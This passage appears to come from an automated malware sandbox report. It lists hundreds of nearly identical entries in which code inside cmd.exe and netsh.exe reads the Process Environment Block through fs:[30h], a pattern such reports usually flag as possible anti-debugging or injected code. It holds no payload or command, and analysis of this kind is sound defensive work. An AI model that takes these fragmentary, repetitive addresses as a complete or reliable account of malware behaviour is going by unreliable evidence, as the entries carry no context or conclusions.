          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B39240 mov eax, dword ptr fs:[00000030h]2_2_04B39240
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04B39240 mov eax, dword ptr fs:[00000030h]2_2_04B39240
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF138A mov eax, dword ptr fs:[00000030h]2_2_04BF138A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C05BA5 mov eax, dword ptr fs:[00000030h]2_2_04C05BA5
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04C08B58 mov eax, dword ptr fs:[00000030h]2_2_04C08B58
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_04BF131B mov eax, dword ptr fs:[00000030h]2_2_04BF131B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00800000 mov eax, dword ptr fs:[00000030h]2_2_00800000
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00800CE4 mov edi, dword ptr fs:[00000030h]2_2_00800CE4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00802C5D mov eax, dword ptr fs:[00000030h]2_2_00802C5D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00804E70 mov eax, dword ptr fs:[00000030h]2_2_00804E70
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03733B7A mov eax, dword ptr fs:[00000030h]9_2_03733B7A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03733B7A mov eax, dword ptr fs:[00000030h]9_2_03733B7A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370DB60 mov ecx, dword ptr fs:[00000030h]9_2_0370DB60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D8B58 mov eax, dword ptr fs:[00000030h]9_2_037D8B58
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370F358 mov eax, dword ptr fs:[00000030h]9_2_0370F358
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370DB40 mov eax, dword ptr fs:[00000030h]9_2_0370DB40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C131B mov eax, dword ptr fs:[00000030h]9_2_037C131B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]9_2_0372A309
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]9_2_0372A309
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]9_2_0372A309
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]9_2_0372A309
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]9_2_0372A309
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]9_2_0372A309
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]9_2_0372A309
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]9_2_0372A309
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]9_2_0372A309
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]9_2_0372A309
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]9_2_0372A309
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]9_2_0372A309
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]9_2_0372A309
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]9_2_0372A309
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]9_2_0372A309
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]9_2_0372A309
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]9_2_0372A309
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]9_2_0372A309
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]9_2_0372A309
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]9_2_0372A309
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A309 mov eax, dword ptr fs:[00000030h]9_2_0372A309
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037303E2 mov eax, dword ptr fs:[00000030h]9_2_037303E2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037303E2 mov eax, dword ptr fs:[00000030h]9_2_037303E2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037303E2 mov eax, dword ptr fs:[00000030h]9_2_037303E2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037303E2 mov eax, dword ptr fs:[00000030h]9_2_037303E2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037303E2 mov eax, dword ptr fs:[00000030h]9_2_037303E2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037303E2 mov eax, dword ptr fs:[00000030h]9_2_037303E2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037B23E3 mov ecx, dword ptr fs:[00000030h]9_2_037B23E3
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037B23E3 mov ecx, dword ptr fs:[00000030h]9_2_037B23E3
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037B23E3 mov eax, dword ptr fs:[00000030h]9_2_037B23E3
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372DBE9 mov eax, dword ptr fs:[00000030h]9_2_0372DBE9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037853CA mov eax, dword ptr fs:[00000030h]9_2_037853CA
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037853CA mov eax, dword ptr fs:[00000030h]9_2_037853CA
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D5BA5 mov eax, dword ptr fs:[00000030h]9_2_037D5BA5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03734BAD mov eax, dword ptr fs:[00000030h]9_2_03734BAD
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03734BAD mov eax, dword ptr fs:[00000030h]9_2_03734BAD
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03734BAD mov eax, dword ptr fs:[00000030h]9_2_03734BAD
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373B390 mov eax, dword ptr fs:[00000030h]9_2_0373B390
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03732397 mov eax, dword ptr fs:[00000030h]9_2_03732397
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C138A mov eax, dword ptr fs:[00000030h]9_2_037C138A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373138B mov eax, dword ptr fs:[00000030h]9_2_0373138B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373138B mov eax, dword ptr fs:[00000030h]9_2_0373138B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373138B mov eax, dword ptr fs:[00000030h]9_2_0373138B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037BD380 mov ecx, dword ptr fs:[00000030h]9_2_037BD380
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03711B8F mov eax, dword ptr fs:[00000030h]9_2_03711B8F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03711B8F mov eax, dword ptr fs:[00000030h]9_2_03711B8F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0374927A mov eax, dword ptr fs:[00000030h]9_2_0374927A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037BB260 mov eax, dword ptr fs:[00000030h]9_2_037BB260
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037BB260 mov eax, dword ptr fs:[00000030h]9_2_037BB260
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D8A62 mov eax, dword ptr fs:[00000030h]9_2_037D8A62
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CEA55 mov eax, dword ptr fs:[00000030h]9_2_037CEA55
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03794257 mov eax, dword ptr fs:[00000030h]9_2_03794257
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03709240 mov eax, dword ptr fs:[00000030h]9_2_03709240
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03709240 mov eax, dword ptr fs:[00000030h]9_2_03709240
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03709240 mov eax, dword ptr fs:[00000030h]9_2_03709240
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03709240 mov eax, dword ptr fs:[00000030h]9_2_03709240
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B236 mov eax, dword ptr fs:[00000030h]9_2_0372B236
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B236 mov eax, dword ptr fs:[00000030h]9_2_0372B236
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B236 mov eax, dword ptr fs:[00000030h]9_2_0372B236
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B236 mov eax, dword ptr fs:[00000030h]9_2_0372B236
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B236 mov eax, dword ptr fs:[00000030h]9_2_0372B236
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B236 mov eax, dword ptr fs:[00000030h]9_2_0372B236
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03744A2C mov eax, dword ptr fs:[00000030h]9_2_03744A2C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03744A2C mov eax, dword ptr fs:[00000030h]9_2_03744A2C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]9_2_0372A229
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]9_2_0372A229
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]9_2_0372A229
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]9_2_0372A229
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]9_2_0372A229
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]9_2_0372A229
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]9_2_0372A229
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]9_2_0372A229
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A229 mov eax, dword ptr fs:[00000030h]9_2_0372A229
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03705210 mov eax, dword ptr fs:[00000030h]9_2_03705210
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03705210 mov ecx, dword ptr fs:[00000030h]9_2_03705210
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03705210 mov eax, dword ptr fs:[00000030h]9_2_03705210
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03705210 mov eax, dword ptr fs:[00000030h]9_2_03705210
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370AA16 mov eax, dword ptr fs:[00000030h]9_2_0370AA16
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370AA16 mov eax, dword ptr fs:[00000030h]9_2_0370AA16
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CAA16 mov eax, dword ptr fs:[00000030h]9_2_037CAA16
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CAA16 mov eax, dword ptr fs:[00000030h]9_2_037CAA16
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03723A1C mov eax, dword ptr fs:[00000030h]9_2_03723A1C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03718A0A mov eax, dword ptr fs:[00000030h]9_2_03718A0A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]9_2_037C4AEF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]9_2_037C4AEF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]9_2_037C4AEF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]9_2_037C4AEF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]9_2_037C4AEF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]9_2_037C4AEF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]9_2_037C4AEF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]9_2_037C4AEF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]9_2_037C4AEF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]9_2_037C4AEF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]9_2_037C4AEF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]9_2_037C4AEF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]9_2_037C4AEF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4AEF mov eax, dword ptr fs:[00000030h]9_2_037C4AEF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03732AE4 mov eax, dword ptr fs:[00000030h]9_2_03732AE4
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03732ACB mov eax, dword ptr fs:[00000030h]9_2_03732ACB
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371AAB0 mov eax, dword ptr fs:[00000030h]9_2_0371AAB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371AAB0 mov eax, dword ptr fs:[00000030h]9_2_0371AAB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373FAB0 mov eax, dword ptr fs:[00000030h]9_2_0373FAB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037052A5 mov eax, dword ptr fs:[00000030h]9_2_037052A5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037052A5 mov eax, dword ptr fs:[00000030h]9_2_037052A5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037052A5 mov eax, dword ptr fs:[00000030h]9_2_037052A5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037052A5 mov eax, dword ptr fs:[00000030h]9_2_037052A5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037052A5 mov eax, dword ptr fs:[00000030h]9_2_037052A5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373D294 mov eax, dword ptr fs:[00000030h]9_2_0373D294
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373D294 mov eax, dword ptr fs:[00000030h]9_2_0373D294
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370B171 mov eax, dword ptr fs:[00000030h]9_2_0370B171
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370B171 mov eax, dword ptr fs:[00000030h]9_2_0370B171
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370C962 mov eax, dword ptr fs:[00000030h]9_2_0370C962
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B944 mov eax, dword ptr fs:[00000030h]9_2_0372B944
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B944 mov eax, dword ptr fs:[00000030h]9_2_0372B944
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373513A mov eax, dword ptr fs:[00000030h]9_2_0373513A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373513A mov eax, dword ptr fs:[00000030h]9_2_0373513A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03724120 mov eax, dword ptr fs:[00000030h]9_2_03724120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03724120 mov eax, dword ptr fs:[00000030h]9_2_03724120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03724120 mov eax, dword ptr fs:[00000030h]9_2_03724120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03724120 mov eax, dword ptr fs:[00000030h]9_2_03724120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03724120 mov ecx, dword ptr fs:[00000030h]9_2_03724120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03709100 mov eax, dword ptr fs:[00000030h]9_2_03709100
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03709100 mov eax, dword ptr fs:[00000030h]9_2_03709100
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03709100 mov eax, dword ptr fs:[00000030h]9_2_03709100
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037941E8 mov eax, dword ptr fs:[00000030h]9_2_037941E8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370B1E1 mov eax, dword ptr fs:[00000030h]9_2_0370B1E1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370B1E1 mov eax, dword ptr fs:[00000030h]9_2_0370B1E1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370B1E1 mov eax, dword ptr fs:[00000030h]9_2_0370B1E1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037851BE mov eax, dword ptr fs:[00000030h]9_2_037851BE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037851BE mov eax, dword ptr fs:[00000030h]9_2_037851BE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037851BE mov eax, dword ptr fs:[00000030h]9_2_037851BE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037851BE mov eax, dword ptr fs:[00000030h]9_2_037851BE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]9_2_037299BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]9_2_037299BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov eax, dword ptr fs:[00000030h]9_2_037299BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]9_2_037299BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]9_2_037299BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov eax, dword ptr fs:[00000030h]9_2_037299BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]9_2_037299BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]9_2_037299BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov eax, dword ptr fs:[00000030h]9_2_037299BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]9_2_037299BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov ecx, dword ptr fs:[00000030h]9_2_037299BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037299BF mov eax, dword ptr fs:[00000030h]9_2_037299BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037361A0 mov eax, dword ptr fs:[00000030h]9_2_037361A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037361A0 mov eax, dword ptr fs:[00000030h]9_2_037361A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C49A4 mov eax, dword ptr fs:[00000030h]9_2_037C49A4
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C49A4 mov eax, dword ptr fs:[00000030h]9_2_037C49A4
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C49A4 mov eax, dword ptr fs:[00000030h]9_2_037C49A4
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C49A4 mov eax, dword ptr fs:[00000030h]9_2_037C49A4
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037869A6 mov eax, dword ptr fs:[00000030h]9_2_037869A6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03732990 mov eax, dword ptr fs:[00000030h]9_2_03732990
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372C182 mov eax, dword ptr fs:[00000030h]9_2_0372C182
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373A185 mov eax, dword ptr fs:[00000030h]9_2_0373A185
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D1074 mov eax, dword ptr fs:[00000030h]9_2_037D1074
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2073 mov eax, dword ptr fs:[00000030h]9_2_037C2073
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03720050 mov eax, dword ptr fs:[00000030h]9_2_03720050
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03720050 mov eax, dword ptr fs:[00000030h]9_2_03720050
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A830 mov eax, dword ptr fs:[00000030h]9_2_0372A830
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A830 mov eax, dword ptr fs:[00000030h]9_2_0372A830
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A830 mov eax, dword ptr fs:[00000030h]9_2_0372A830
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372A830 mov eax, dword ptr fs:[00000030h]9_2_0372A830
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371B02A mov eax, dword ptr fs:[00000030h]9_2_0371B02A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371B02A mov eax, dword ptr fs:[00000030h]9_2_0371B02A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371B02A mov eax, dword ptr fs:[00000030h]9_2_0371B02A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371B02A mov eax, dword ptr fs:[00000030h]9_2_0371B02A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373002D mov eax, dword ptr fs:[00000030h]9_2_0373002D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373002D mov eax, dword ptr fs:[00000030h]9_2_0373002D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373002D mov eax, dword ptr fs:[00000030h]9_2_0373002D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373002D mov eax, dword ptr fs:[00000030h]9_2_0373002D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373002D mov eax, dword ptr fs:[00000030h]9_2_0373002D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D4015 mov eax, dword ptr fs:[00000030h]9_2_037D4015
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D4015 mov eax, dword ptr fs:[00000030h]9_2_037D4015
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03787016 mov eax, dword ptr fs:[00000030h]9_2_03787016
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03787016 mov eax, dword ptr fs:[00000030h]9_2_03787016
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03787016 mov eax, dword ptr fs:[00000030h]9_2_03787016
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037040E1 mov eax, dword ptr fs:[00000030h]9_2_037040E1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037040E1 mov eax, dword ptr fs:[00000030h]9_2_037040E1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037040E1 mov eax, dword ptr fs:[00000030h]9_2_037040E1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B8E4 mov eax, dword ptr fs:[00000030h]9_2_0372B8E4
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B8E4 mov eax, dword ptr fs:[00000030h]9_2_0372B8E4
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037058EC mov eax, dword ptr fs:[00000030h]9_2_037058EC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h]9_2_0379B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379B8D0 mov ecx, dword ptr fs:[00000030h]9_2_0379B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h]9_2_0379B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h]9_2_0379B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h]9_2_0379B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379B8D0 mov eax, dword ptr fs:[00000030h]9_2_0379B8D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373F0BF mov ecx, dword ptr fs:[00000030h]9_2_0373F0BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373F0BF mov eax, dword ptr fs:[00000030h]9_2_0373F0BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373F0BF mov eax, dword ptr fs:[00000030h]9_2_0373F0BF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]9_2_037320A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]9_2_037320A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]9_2_037320A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]9_2_037320A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]9_2_037320A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037320A0 mov eax, dword ptr fs:[00000030h]9_2_037320A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037490AF mov eax, dword ptr fs:[00000030h]9_2_037490AF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03709080 mov eax, dword ptr fs:[00000030h]9_2_03709080
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03783884 mov eax, dword ptr fs:[00000030h]9_2_03783884
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03783884 mov eax, dword ptr fs:[00000030h]9_2_03783884
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371FF60 mov eax, dword ptr fs:[00000030h]9_2_0371FF60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D8F6A mov eax, dword ptr fs:[00000030h]9_2_037D8F6A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371EF40 mov eax, dword ptr fs:[00000030h]9_2_0371EF40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373E730 mov eax, dword ptr fs:[00000030h]9_2_0373E730
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B73D mov eax, dword ptr fs:[00000030h]9_2_0372B73D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B73D mov eax, dword ptr fs:[00000030h]9_2_0372B73D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03704F2E mov eax, dword ptr fs:[00000030h]9_2_03704F2E
